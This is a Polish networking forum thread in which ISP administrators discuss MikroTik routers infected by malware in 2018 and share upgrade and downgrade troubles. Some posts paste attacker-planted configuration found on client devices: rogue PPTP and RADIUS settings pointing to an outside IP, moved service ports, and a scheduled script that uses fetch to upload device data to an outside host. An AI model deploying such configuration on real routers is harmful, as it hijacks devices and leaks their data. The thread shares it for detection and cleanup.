Trzepak.pl

Regulamin forum


Wypowiedzi muszą stosować się do zasad ogólnie przyjętej "netykiety" wynikającej z dokumentu RFC 1855, zamieszczonego pod tym adresem:
http://www.ietf.org/rfc/rfc1855.txt
Osoby wypowiadające się tu "zawodowo" proszone są o logowanie się swoim imieniem i nazwiskiem, a w stopce ich wypowiedzi wskazane jest przedstawienie danych adresowych łącznie z linkiem do strony głównej przedsiębiorstwa lub organizacji, którą reprezentują.
Umieszczanie informacji reklamowych w wypowiedzi i w stopce nie jest wskazane a moderatorzy mogą ingerować usuwając takie posty w sposób nie podlegający dyskusji.



Nowy temat  Odpowiedz w temacie
Przejdź na stronę Poprzednia 1 2 3 4 5 6 Następna
Autor Wiadomość
Post: wt, 15 maja 2018 15:03:31 
Odpowiedz z cytatem
Offline
Powieściopisarz
Powieściopisarz

Rejestracja: czw, 25 mar 2010 13:23:23
Posty: 1816
Jest już jakiś sposób na sprawdzenie czy dany MT jest w 100% czysty?

_________________
www.inet.one.pl
Konfiguracja BGP. Podział pasma (filtry mieszające, IFB). Skrypty bash, perl.


Na górę
Post: śr, 16 maja 2018 3:51:56 
Odpowiedz z cytatem
Offline
Czytelnik
Czytelnik

Rejestracja: pn, 10 cze 2013 9:00:41
Posty: 107
Lokalizacja: Rzeszów / Warszawa
Z tego co Łotysze pisali u siebie wgranie aktualki kasuje wszystkie zmiany poczynione w systemie plików przez infekcję, choć może to nie zadziałać jak należy przy routerach z wgraną customizacją/brandem - wtedy najbezpieczniej zrobić netinstall.


Na górę
Post: pt, 15 cze 2018 18:23:49 
Odpowiedz z cytatem
Offline
Żółtodziób
Żółtodziób

Rejestracja: wt, 14 paź 2014 10:37:44
Posty: 22
Znalezione u klienta na urządzeniu:

0 ;;; Add you ip addess to allow-ip in Address Lists.
chain=input action=tarpit protocol=tcp dst-port=30553

1 ;;; The security flaw for Hajime is closed by the firewall.
chain=input action=add-src-to-address-list protocol=icmp
address-list=allow-ip address-list-timeout=1h packet-size=1083

2 ;;; Please update RotherOS and change password.
chain=input action=accept src-address-list=allow-ip

3 ;;; Thanks are accepted on WebMoney Z399578297824
chain=input action=drop protocol=udp dst-port=53

4 ;;; or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1
chain=input action=drop protocol=tcp
dst-port=53,8728,8729,21,22,23,80,443,8291

Miło ;)


Na górę
Post: wt, 26 cze 2018 8:51:23 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: ndz, 19 lip 2009 10:41:45
Posty: 1118
wczoraj zostałem wezwany do pomocy przy wywalającej sieci oto zmiany jakie znalazłem !
System był aktualny ! tyle ze nie zmienili haseł z tego co wiem.
z tego co w sieci wyczytałem wbijka dotyczy wersji MT 6.42.3


/ip pool
add name=pool1 ranges=10.1.1.2-10.1.1.250
/ppp profile
add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test
remote-address=pool1 use-encryption=yes


/interface pptp-server server
set authentication=pap,chap default-profile=test enabled=yes

/ip firewall nat
add action=masquerade chain=srcnat
add action=masquerade chain=srcnat
add action=masquerade chain=srcnat
add action=masquerade chain=srcnat

/ip service
set telnet port=2399
set ftp port=2121
set www disabled=yes
set ssh port=2299
set winbox port=8291

/ppp aaa set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes

/radius
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
add address=47.75.230.175 secret=test service=ppp
/radius incoming set accept=yes
/system identity set name=test

był jeszcze skrypt i scheduler o nazwach "ip" niestety usunąłem zanik zrobiłem export, no ale znalazłem w sieci scheduler uruchamiał ponioższy skrypt co 2h.

/system script
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx ... 98fa&actio\
n=upload&sncode=F8C49100B20F15CD3F906164FD50CB7A&dynamic=static\")}"


Ostatnio zmieniony wt, 26 cze 2018 9:09:15 przez Gularz_pl, łącznie zmieniany 1 raz.

Na górę
Post: wt, 26 cze 2018 9:06:24 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik
Awatar użytkownika

Rejestracja: śr, 24 kwie 2013 18:07:46
Posty: 1341
Lokalizacja: Myszków
Gularz_pl pisze:
...
z tego co w sieci wyczytałem wbijka dotyczy wersji MT 6.24.3
...

6.24.3 czy 6.42.3 bo to kolosalna różnica.

_________________
http://www.morawiec.info - taki tam sobie blog


Na górę
Post: wt, 26 cze 2018 9:09:42 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: ndz, 19 lip 2009 10:41:45
Posty: 1118
Cramin pisze:
Gularz_pl pisze:
...
z tego co w sieci wyczytałem wbijka dotyczy wersji MT 6.24.3
...

6.24.3 czy 6.42.3 bo to kolosalna różnica.



poprawiłem 6.42.3


Na górę
Post: wt, 26 cze 2018 10:05:20 
Odpowiedz z cytatem
Offline
Wyciszony literat
Wyciszony literat

Rejestracja: sob, 30 sie 2014 20:03:43
Posty: 885
Ja sądzę, że skrypty były wgrane wcześniej. Trzeba było sprawdzić przed aktualizacją co jest powgrywane do mietków.


Na górę
Post: wt, 26 cze 2018 13:09:53 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: ndz, 19 lip 2009 10:41:45
Posty: 1118
djrobson pisze:
Ja sądzę, że skrypty były wgrane wcześniej. Trzeba było sprawdzić przed aktualizacją co jest powgrywane do mietków.


No własnie plików nie było, sam aktualizowałem do najnowszej wersji.


Na górę
Post: wt, 26 cze 2018 13:54:34 
Odpowiedz z cytatem
Offline
Wyciszony literat
Wyciszony literat

Rejestracja: sob, 30 sie 2014 20:03:43
Posty: 885
Plików nie. Zajrzałeś do /system script ?


Na górę
Post: pt, 29 cze 2018 8:23:02 
Odpowiedz z cytatem
Offline
Obserwator
Obserwator

Rejestracja: ndz, 03 sty 2010 19:09:24
Posty: 41
djrobson pisze:
Plików nie. Zajrzałeś do /system script ?
Ja mialem tak ze nic nie bylo w scheduler, system scripts, i w files, jedyne to w firewalu conections bylo otwarte okolo 60k połączeń

Wysłane z mojego MI 6 przy użyciu Tapatalka


Na górę
Post: wt, 03 lip 2018 13:26:49 
Odpowiedz z cytatem
Offline
Fanatyczny prenumerator
Fanatyczny prenumerator

Rejestracja: pn, 23 mar 2009 10:31:14
Posty: 444
Nie wiem, czy wir nie ewoluuje. Za zadne skarby nie moge wgrac nowego softu. Po zaciagnieciu pliku z automatu go kasuje. Spotkal sie ktos z czyms takim?

Wysłane z mojego SM-G955F przy użyciu Tapatalka


Na górę
Post: wt, 03 lip 2018 15:38:47 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik
Awatar użytkownika

Rejestracja: śr, 28 lis 2007 16:11:06
Posty: 1406
Lokalizacja: Stalowa
daj z winboxa download & install

_________________
DeVeloPer PreView


Na górę
Post: wt, 03 lip 2018 15:42:07 
Odpowiedz z cytatem
Offline
Fanatyczny prenumerator
Fanatyczny prenumerator

Rejestracja: pn, 23 mar 2009 10:31:14
Posty: 444
nerxu pisze:
daj z winboxa download & install
Nie dziala - dziwna sprawa. Chyba wycieczka do klienta nas czeka

Wysłane z mojego SM-G955F przy użyciu Tapatalka


Na górę
Post: wt, 03 lip 2018 15:46:12 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik
Awatar użytkownika

Rejestracja: śr, 28 lis 2007 16:11:06
Posty: 1406
Lokalizacja: Stalowa
pewnie kondziaki

_________________
DeVeloPer PreView


Na górę
Post: sob, 07 lip 2018 11:07:07 
Odpowiedz z cytatem
Offline
Młodociany subskrybent
Młodociany subskrybent

Rejestracja: czw, 25 mar 2010 0:55:51
Posty: 230
Poaktualizowałem wszystko na 6.42.5 i popsuły mi się niektóre linki na UBI, poprzednio dobrze działające.
Przy próbie downgrade na 6.40.8 Omnitik już się nie odezwał :( Macie jakiś pomysł co należy zmienić w opcjach aby przywrócić stan wireless jaki tam był przed upgradem albo jak bezpiecznie zejść do 6.40.8? Poprzednio miałem tam 6.40.5 i nie licząc zagrożenia wirusem wszystko było ok.


Na górę
Post: sob, 07 lip 2018 11:24:01 
Odpowiedz z cytatem
Offline
trzepakowy master
trzepakowy master

Rejestracja: śr, 12 mar 2008 16:12:35
Posty: 8377
Fizyczna obecność przy maszynie, export konfigu do pliku, laptop naładowany, sprawna skrętka, winbox i to wszystko. u mnie 100% downgrade z 6.42.1 i 6.42.2 do 6.40.8 kończyła się utratą konfiguracji, niezależnie od platformy.

Najważniejsze węzły podnosiłem od 0 w nocy przez sprzętowe konsole IPMI co by nie robić sobie wycieczek po 30 kilometrów od punktu do punktu.

_________________
www.fiberion.pl


Na górę
Post: sob, 07 lip 2018 11:29:39 
Odpowiedz z cytatem
Offline
Młodociany subskrybent
Młodociany subskrybent

Rejestracja: czw, 25 mar 2010 0:55:51
Posty: 230
U mnie po downgrade nie chce nawet wstać...nie widzę go na winboxie ani przez netinstall. Czekam na zamiennik i zaraz będę się po niego wdrapywał. U Ciebie z jakim ip się one zgłaszały po downgradzie?


Na górę
Post: sob, 07 lip 2018 12:26:30 
Odpowiedz z cytatem
Offline
trzepakowy master
trzepakowy master

Rejestracja: śr, 12 mar 2008 16:12:35
Posty: 8377
z żadnym IP. zero konfiguracji, goła i świeża instalacja. brak plików backupu / exportu :)

_________________
www.fiberion.pl


Na górę
Post: sob, 07 lip 2018 12:52:56 
Odpowiedz z cytatem
Offline
Wyciszony literat
Wyciszony literat

Rejestracja: sob, 30 sie 2014 20:03:43
Posty: 885
barp21 pisze:
Poaktualizowałem wszystko na 6.42.5 i popsuły mi się niektóre linki na UBI, poprzednio dobrze działające.


Żenisz ubi z mietkami? Chyba żartujesz.


Na górę
Post: sob, 07 lip 2018 13:42:11 
Odpowiedz z cytatem
Offline
Młodociany subskrybent
Młodociany subskrybent

Rejestracja: czw, 25 mar 2010 0:55:51
Posty: 230
UBI dosył, MT klienci, oczywiście wszystko homogeniczne UBI z UBI, MT z MT.


Na górę
Post: sob, 07 lip 2018 15:32:23 
Odpowiedz z cytatem
Offline
Wyciszony literat
Wyciszony literat

Rejestracja: sob, 30 sie 2014 20:03:43
Posty: 885
Może DFS ci się pozałączał w mietkach, po prostu przypadek i częstotliwości nachodzą na siebie, i CCQ dostaje po dupie.


Na górę
Post: sob, 07 lip 2018 16:02:10 
Odpowiedz z cytatem
Offline
Czytelnik
Czytelnik

Rejestracja: pn, 10 cze 2013 9:00:41
Posty: 107
Lokalizacja: Rzeszów / Warszawa
Orin pisze:
u mnie 100% downgrade z 6.42.1 i 6.42.2 do 6.40.8 kończyła się utratą konfiguracji, niezależnie od platformy.

O tym to zresztą nawet MT pisze w temacie dotyczącym upgradu 6.40 -> 6.41 (bo zmienia się praktycznie cała architektura mostów i lanów, od 6.41 nie istnieją już na przykład master-porty) :)


Na górę
Post: sob, 07 lip 2018 16:10:52 
Odpowiedz z cytatem
Offline
trzepakowy master
trzepakowy master

Rejestracja: śr, 12 mar 2008 16:12:35
Posty: 8377
a to że 6.42.x jest spierd.... to już nie raczyli napisać :)

_________________
www.fiberion.pl


Na górę
Post: sob, 07 lip 2018 18:37:01 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik
Awatar użytkownika

Rejestracja: śr, 28 lis 2007 16:11:06
Posty: 1406
Lokalizacja: Stalowa
Zgodzę się z tobą :)

Nawet na RB450 nie ma wszystkich zakładek na ether1 :D

Skrypt sprawdzający LAN tez nie działa dla eth1 na RB2011 :zlosc:

RB750 zrobiły się toporne

itp.itd.

_________________
DeVeloPer PreView


Na górę
Post: sob, 07 lip 2018 19:02:00 
Odpowiedz z cytatem
Offline
Młodociany subskrybent
Młodociany subskrybent

Rejestracja: czw, 25 mar 2010 0:55:51
Posty: 230
Widziałem w chanelogu tą uwagę. Generalnie dziwne jak już mam omntikia na biurku to śmiga upgrade/downgrade i tak do znudzenia. Jak był na maszcie to tak ładnie nie działało. Wiecie może co oni w tym nv2 nagrzebali że to się takie agresywne stało? Trochę się boję, ale chyba będę musiał wrócić na reszcie urządzeń wrócić do 6.40.8


Na górę
Wyświetl posty nie starsze niż:  Sortuj wg  
Nowy temat  Odpowiedz w temacie
Przejdź na stronę Poprzednia 1 2 3 4 5 6 Następna


Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 13 gości


Nie możesz tworzyć nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz dodawać załączników

Szukaj:
Przejdź do:  
Dzisiaj jest sob, 17 lis 2018 6:26:07

Strefa czasowa UTC+02:00

Moderatorzy: Administratorzy, Moderatorzy

Nakarm glodne dziecko - wejdz na strone www.Pajacyk.pl


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
SubSilver2 modified for Trzepak.pl by Colir
Polski pakiet językowy dostarcza phpBB.pl